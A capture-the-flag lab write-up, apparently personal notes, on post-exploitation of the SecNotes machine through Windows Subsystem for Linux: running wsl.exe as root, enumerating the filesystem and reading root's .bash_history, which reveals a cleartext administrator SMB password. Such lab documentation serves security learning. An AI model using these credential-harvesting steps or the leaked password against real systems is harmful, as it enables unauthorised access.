WSL

windows subsystem for linux (wsl) is a compatibility layer for running binaries Linux format (in ELF ) natively on Windows 10 , Windows 11 and Windows Server 2019 without the need for a separate virtual machine or dual booting. There are two versions of WSL. WSL and WSL2

During the post enumeration, I was able to discover that the target system has WSL installed from multiple sources including the presence of bash.exe at the home directory of tyler user, an Ubuntu installation package at the system root and finally wsl.exe enumerated by PEAS

according to peas, the wsl.exe binary is located at c:\Windows\System32\wsl.exe

ps c:\> \Windows\System32\wsl.exe id
uid=0(root) gid=0(root) groups=0(root)
ps c:\> \Windows\System32\wsl.exe whoami
root
ps c:\> \Windows\System32\wsl.exe hostname
SECNOTES

i am able to interact with the filesystem as if it was a linux environment via the wsl binary at c:\Windows\System32\wsl.exe It shows that I am currently the root user. Does that mean that the wsl process is running with privileges of the administrator user?

ps c:\> \Windows\System32\wsl.exe pwd
/mnt/c

The current directory is /mnt/c This tells me that the whole filesystem is mounted to the /mnt directory

ps c:\> \Windows\System32\wsl.exe : ls: cannot open directory 'Users/Administrator': Permission denied
at line:1 char:1
+ \Windows\System32\wsl.exe ls -la Users/Administrator
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + categoryinfo          : NotSpecified: (ls: cannot open...rmission denied:String) [], RemoteE 
   xception
    + fullyqualifiederrorid : NativeCommandError

attempting to check the /mnt/c/users/administrator(c:\Users\Administrator) directory fails with permission error. So I guess I still don’t have access to it although I am running the WSL session as the root user

System root

PS C:\> \Windows\System32\wsl.exe ls -la ../
total 0
drwxr-xr-x 1 root root 512 Jun 21  2018 .
drwxr-xr-x 1 root root 512 Jun 21  2018 ..
drwxrwxrwx 1 root root 512 Jan 24 23:09 c
PS C:\> \Windows\System32\wsl.exe ls -la ../../
total 88
drwxr-xr-x  1 root root   512 Jun 21  2018 .
drwxr-xr-x  1 root root   512 Jun 21  2018 ..
drwxr-xr-x  1 root root   512 Jun 21  2018 bin
drwxr-xr-x  1 root root   512 Apr 25  2018 boot
drwxr-xr-x  1 root root   512 Jan 24 23:56 dev
drwxr-xr-x  1 root root   512 Jun 22  2018 etc
drwxr-xr-x  1 root root   512 Apr 24  2018 home
-rwxr-xr-x  1 root root 87944 Dec 31  1969 init
drwxr-xr-x  1 root root   512 Apr 25  2018 lib
drwxr-xr-x  1 root root   512 Apr 25  2018 lib64
drwxr-xr-x  1 root root   512 Apr 25  2018 media
drwxr-xr-x  1 root root   512 Jun 21  2018 mnt
drwxr-xr-x  1 root root   512 Apr 25  2018 opt
dr-xr-xr-x  8 root root     0 Jan 24 23:56 proc
drwx------  1 root root   512 Jun 22  2018 root
drwxr-xr-x  1 root root   512 Jan 24 23:56 run
drwxr-xr-x  1 root root   512 Jun 22  2018 sbin
drwxr-xr-x  1 root root   512 Apr 16  2018 snap
drwxr-xr-x  1 root root   512 Apr 25  2018 srv
dr-xr-xr-x 12 root root     0 Jan 24 23:56 sys
drwxrwxrwt  1 root root   512 Jun 22  2018 tmp
drwxr-xr-x  1 root root   512 Apr 25  2018 usr
drwxr-xr-x  1 root root   512 Apr 25  2018 var

When I list out the parent directory of the parent directory of the current directory (/mnt/c), I see the familiar Linux system root

PS C:\> \Windows\System32\wsl.exe ls -la ../../home
total 0
drwxr-xr-x 1 root root 512 Apr 24  2018 .
drwxr-xr-x 1 root root 512 Jun 21  2018 ..

There is no one at the home directory

/root

ps c:\> \Windows\System32\wsl.exe ls -la ../../root
total 8
drwx------ 1 root root  512 Jun 22  2018 .
drwxr-xr-x 1 root root  512 Jun 21  2018 ..
---------- 1 root root  398 Jun 22  2018 .bash_history
-rw-r--r-- 1 root root 3112 Jun 22  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwxrwxrwx 1 root root  512 Jun 22  2018 filesystem

The home directory of the root user has the .bash_history file with 398 bytes of content

CLEARTEXT Credential

PS C:\> \Windows\System32\wsl.exe cat ../../root/.bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history 
less .bash_history
exit

Aha! I see a list of commands that were put before, and one of them has a CLEARTEXT credential in it. smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$ The command above connected to the SMB server with the credential of administrator user.

Distro?

ps c:\> \Windows\System32\wsl.exe cat ../../etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"
NAME="Ubuntu"
VERSION="18.04 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04 LTS"
VERSION_ID="18.04"
home_url="https://www.ubuntu.com/"
support_url="https://help.ubuntu.com/"
bug_report_url="https://bugs.launchpad.net/ubuntu/"
privacy_policy_url="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

It was Ubuntu all along.

InfoSec LAB

Explorer

SecNotes_WSL

WSL

System root

/root

CLEARTEXT Credential

Distro?

Interactive Graph View

Table of Contents

Backlinks